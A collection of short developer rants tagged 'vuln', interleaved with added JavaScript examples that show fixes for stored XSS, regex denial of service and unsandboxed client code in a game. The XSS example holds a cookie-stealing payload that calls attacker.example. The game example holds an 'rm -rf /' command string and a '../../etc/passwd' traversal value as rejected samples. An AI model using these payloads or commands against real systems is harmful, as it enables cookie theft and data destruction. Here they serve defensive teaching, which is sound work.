Search - "vuln"
-
The Windows/Microsoft fanboy I've ranted about multiple times.
- wouldn't use anything except Windows. Even if required for a project (I would if really needed; have done that a few times already)
- refused to use any framework/language not written by Microsoft
- tried to get other projects to use Windows/.NET when it wasn't required and it was only Linux/PHP guys (and that fit the projects perfectly)
- ONLY wanted to use Skype and WhatsApp. Always bragged about how he had 10 GB of Skype history.
- didn't want to use anything related to Linus Torvalds or open source because 'those are open source and have no business model so they're bad'
And then: he suggested the use of Windows Server right after one was hacked (Windows vuln that wasn't patched yet), which caused the devops guys to want to install a new Linux server for it.
Even the Windows sysadmin pointed to the door when he said that and gave him a huge 'GTFO' face cD
Yeah, fuck him.
-
A stored XSS vuln in a banner-like component, visible on ALL the pages in the portal. Anyone can attack anyone.
HOWEVER this was not discovered by the 3rd-party security specialists during the latest security audit. I escalated this to my manager and got the reply that unless the client actively requests this to be fixed, I shouldn't do anything about it.
FFS.. it's only 2 lines of code.. And there's nothing I can do about it.
Eventually I was transferred to another project. Now it's not my problem anymore.
-
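The kind of "2 lines of code" fix the rant above is talking about, as an added example that is not the portal's code and not part of the rant: a site-wide banner rendered once with raw concatenation (the stored XSS) and once with output encoding. The banner record, its field names and the payload are constructed for the demo; the record is assumed to come from a database field that any portal user can write to.

```javascript
// Added example, not code from the rant's portal: a banner component that
// is rendered on every page, first the way a stored XSS gets in and then with
// the output encoding that fixes it. The banner record is assumed to come from
// a database field that any portal user can write to.

const HTML_ESCAPES = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };

// Encode a value for the HTML text or double-quoted attribute context.
function escapeHtml(value) {
  return String(value).replace(/[&<>"']/g, (c) => HTML_ESCAPES[c]);
}

// Vulnerable: stored strings are concatenated straight into markup, so a
// message containing a tag, or a title containing a quote, becomes part of
// the page for every visitor of every page that shows the banner.
function renderBannerUnsafe(banner) {
  return `<div class="banner" title="${banner.title}">${banner.message}</div>`;
}

// Fixed: the same template with each untrusted value encoded for where it lands.
function renderBannerSafe(banner) {
  return `<div class="banner" title="${escapeHtml(banner.title)}">${escapeHtml(banner.message)}</div>`;
}

// Constructed sample record with a payload for each of the two contexts:
// the title breaks out of the attribute, the message injects a tag.
const STORED_BANNER = {
  title: '" onmouseover="fetch(`//attacker.example/?c=` + document.cookie)',
  message: 'Maintenance tonight <img src=x onerror="alert(document.domain)">',
};

// Crude detector used only to compare the two renderings: does the markup
// still contain a raw tag, or an event-handler attribute followed by a real
// quote? In the encoded output the same text appears as &lt;img and
// onmouseover=&quot;, which the browser treats as inert text.
function containsActiveContent(html) {
  return /<img\b|\bon\w+\s*=\s*["']/i.test(html);
}

console.log('unsafe:', renderBannerUnsafe(STORED_BANNER));
console.log('safe:  ', renderBannerSafe(STORED_BANNER));
console.log('unsafe executes:', containsActiveContent(renderBannerUnsafe(STORED_BANNER)));
console.log('safe executes:  ', containsActiveContent(renderBannerSafe(STORED_BANNER)));
```

On the client side the equivalent change is `el.textContent = banner.message` instead of `el.innerHTML = ...`. The encoder above only covers HTML text and double-quoted attributes; a value landing in a URL, a script block or a style block needs the encoder for that context, and the detector is a comparison aid, not a scanner.
-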
Just found out some of our smaller sites (WP) have been hit with a shell...
In fucking January.
My colleagues didn't think to tell me this.
They figured someone must have had the pass or something and started posting about Viagra...
No. It's the fucking ico vuln...
I hate work right now.
-
Beware of NPM packages maintained by Brandon Nozaki Miller alias RIAEvangelist. He added IP-specific malware to node-ipc.
https://security.snyk.io/vuln/...
https://github.com/RIAEvangelist/...
-
FYI if you have ES File Explorer, get rid of it because it has a major vuln that lets others extract files from your phone.
https://xda-developers.com/es-file-...
There are many better alternatives; I personally use FX.
…
...
...WHY TF DOES A FILE EXPLORER RUN AN HTTP SERVER IN THE BACKGROUND?!
-
Back at <biginternationalorg> I witnessed a developer deliberately build an XSS vuln into a company web application, so that he could plug in a JS file with all of his passwords hardcoded. Bear in mind, this is an org that provides services to both the UK and US military, and if you have access to some stuff you have access to the tools you need to impersonate high-ranking military folks.
I know it's like twenty different passwords, but that's what a goddamn keychain is for! If you don't trust Windows keychains, do what I did and run a VM with a FOSS keychain installed! Don't build a vuln right into a public-facing web app, that's just stupidity.
-
Bug handling advice #1337:
Do it like Poettering at systemd:
- Bug incoming[1]
- "That's not a bug!"
- Wait for CVE with 9.8 critical score[2]
- "Ok, well... might be a bug..."
[1]: https://github.com/systemd/systemd/...
[2]: https://nvd.nist.gov/vuln/detail/...
-
TIL "Regular Expression DDoS" is a thing.
I thought the OS/server would be smart enough to cut short long-running, CPU-intensive session threads without affecting others; that's their job after all.
I overestimated the OS level I guess :v
https://security.snyk.io/vuln/... //ref
-
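What the rant above ran into, as an added example that is not from the rant or the linked advisory: a pattern with catastrophic backtracking beside a linear rewrite that accepts the same strings, plus the two guards an application has to apply itself, because a regex match runs synchronously on the JavaScript thread and neither the OS nor Node will interrupt it for you. `MAX_LEN` and the sample lengths are assumed values.

```javascript
// Added example, not from the Snyk advisory the rant links: a regex with
// catastrophic backtracking next to a linear rewrite, and the guards an
// application has to apply itself because a single synchronous match is not
// preempted by the OS or the runtime. MAX_LEN is an assumed policy.

// Vulnerable: a nested quantifier over the same characters. On a non-matching
// input such as "aaaaaaaaaaaaaaaa!" the engine tries every way of splitting
// the run of a's between the inner and outer quantifier before giving up,
// so the work grows as 2^n with the input length.
const VULNERABLE = /^(a+)+$/;

// Accepts exactly the same strings with one pass over the input.
const SAFE = /^a+$/;

// Worst-case input for VULNERABLE: n a's followed by a character that
// makes the overall match fail, forcing the backtracking.
function evilInput(n) {
  return 'a'.repeat(n) + '!';
}

// Guard 1: bound the input before the regex sees it. Catastrophic
// backtracking is only dangerous when the attacker controls the length.
const MAX_LEN = 64;
function matchesBounded(re, input, maxLen = MAX_LEN) {
  if (typeof input !== 'string' || input.length > maxLen) return false;
  return re.test(input);
}

// Guard 2 (diagnostic): time a regex over growing worst-case inputs. A
// linear pattern gives roughly flat numbers; a backtracking one roughly
// doubles per extra character. Returns milliseconds keyed by input length.
function timeRegex(re, lengths) {
  const result = {};
  for (const n of lengths) {
    const input = evilInput(n);
    const start = process.hrtime.bigint();
    re.test(input);
    result[n] = Number(process.hrtime.bigint() - start) / 1e6;
  }
  return result;
}

// Confirms the two patterns accept and reject the same sample strings,
// i.e. the rewrite did not change the language being matched.
function patternsAgree(samples) {
  return samples.every((s) => VULNERABLE.test(s) === SAFE.test(s));
}

const LENGTHS = [10, 14, 18, 22]; // kept small so the demo finishes quickly
console.log('vulnerable ms:', timeRegex(VULNERABLE, LENGTHS));
console.log('safe ms:      ', timeRegex(SAFE, LENGTHS));
```

Real-world offenders look less obvious than `(a+)+` (an email or whitespace-trimming validator with `(\w+\s?)*` or `(.*?)*` in it), which is why the length cap matters even when you believe the pattern is fine. If a match over untrusted input cannot be bounded, run it in a worker that the main thread can terminate on a deadline.
-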
Discord apparently has a new vuln allowing bot accounts to become normal accounts without regenerating the token. Explains all the thotbots and shit appearing.
-
My old game had this flow every time a client placed an object:
Client A creates a new generic object and attaches texture paths (yep, global paths are allowed) and... Lua code as strings to it.
Client A sends the entire object list to the server.
Server receives it, replaces its own object list.
Server copies the entire object list and sends it to all clients.
Client A and Client B both receive the object list and replace their versions.
All clients see that the object contains some code as strings.
They compile and store it, and then run it every frame. UNSANDBOXED.
Any client could make all other ones execute any code, and I was proud of my idea!
-
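The check that is missing from the flow above, as an added example that is not the game's code and not part of the rant: before the server replaces its object list and fans it out, every client-supplied object is validated against a fixed shape, texture paths are forced to stay relative and inside the assets tree, and any field that could carry code is rejected outright instead of being compiled by every other client. The field names, the path policy and the size limit are assumptions for the demo.

```javascript
// Added example, not the game's code: server-side validation of a
// client-submitted object list. Only known data fields survive, texture paths
// are relative and confined to the assets tree, and nothing is ever compiled
// or eval'd. Field names, path policy and limits are assumed for the demo.

const ALLOWED_KEYS = new Set(['id', 'x', 'y', 'texture']);

// Relative path of lowercase/digit/_/- segments ending in .png or .jpg.
// No leading slash, no drive letter, no "." segments, so "../" and
// absolute paths fail before any file access happens.
const TEXTURE_RE = /^[a-z0-9_-]+(\/[a-z0-9_-]+)*\.(png|jpg)$/i;

// Validates one object; returns { ok, reason } so the caller can log why.
function validateObject(obj) {
  if (obj === null || typeof obj !== 'object' || Array.isArray(obj)) {
    return { ok: false, reason: 'not an object' };
  }
  // Any field outside the schema (code, script, __proto__, ...) is rejected,
  // rather than stripped, so a client that sends code gets a hard error.
  for (const key of Object.keys(obj)) {
    if (!ALLOWED_KEYS.has(key)) return { ok: false, reason: `unexpected field "${key}"` };
  }
  if (!Number.isInteger(obj.id) || obj.id < 0) return { ok: false, reason: 'bad id' };
  if (!Number.isFinite(obj.x) || !Number.isFinite(obj.y)) return { ok: false, reason: 'bad position' };
  if (typeof obj.texture !== 'string' || !TEXTURE_RE.test(obj.texture)) {
    return { ok: false, reason: 'bad texture path' };
  }
  return { ok: true };
}

// Validates the whole list and returns a fresh copy built only from known
// fields. Throws on the first bad object so the server never swaps in a
// partially trusted list; the caller keeps its old state on failure.
function acceptObjectList(list, maxObjects = 1000) {
  if (!Array.isArray(list) || list.length > maxObjects) throw new Error('bad object list');
  const clean = [];
  for (const obj of list) {
    const verdict = validateObject(obj);
    if (!verdict.ok) throw new Error(`rejected object: ${verdict.reason}`);
    clean.push({ id: obj.id, x: obj.x, y: obj.y, texture: obj.texture });
  }
  return clean;
}

// Constructed sample submissions: one honest object and three that a
// client in the original flow could have used against everyone else.
const GOOD = { id: 1, x: 1.5, y: 2, texture: 'props/crate.png' };
const WITH_CODE = { ...GOOD, code: 'os.execute("rm -rf /")' };
const TRAVERSAL = { id: 2, x: 0, y: 0, texture: '../../etc/passwd' };
const ABSOLUTE = { id: 3, x: 0, y: 0, texture: 'C:/Windows/System32/evil.png' };

console.log(validateObject(GOOD), validateObject(WITH_CODE), validateObject(TRAVERSAL), validateObject(ABSOLUTE));
console.log(acceptObjectList([GOOD]));
```

Validation is the half that keeps code out of the object list; the other half is that the server fans out only the copy it built itself (`clean`), never the client's original, so a field the validator did not know about cannot ride through to the other players. If objects genuinely need behaviour, that behaviour belongs in a server-chosen set of named behaviours the client can only select, not supply.
-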
So we were having a heated debate about MS's decision on introducing ads in the me menu.
So I was saying this can be a potential critical vuln as always... it's kind of like MS's trademark now :-C
My reasoning was that now ads will have direct access to PC memory since they are being delivered straight to your PC,
and this other guy went on to say they are being delivered to your machine, they are being delivered to Explorer... and I was like WTF?? Isn't Explorer a process running directly on your machine??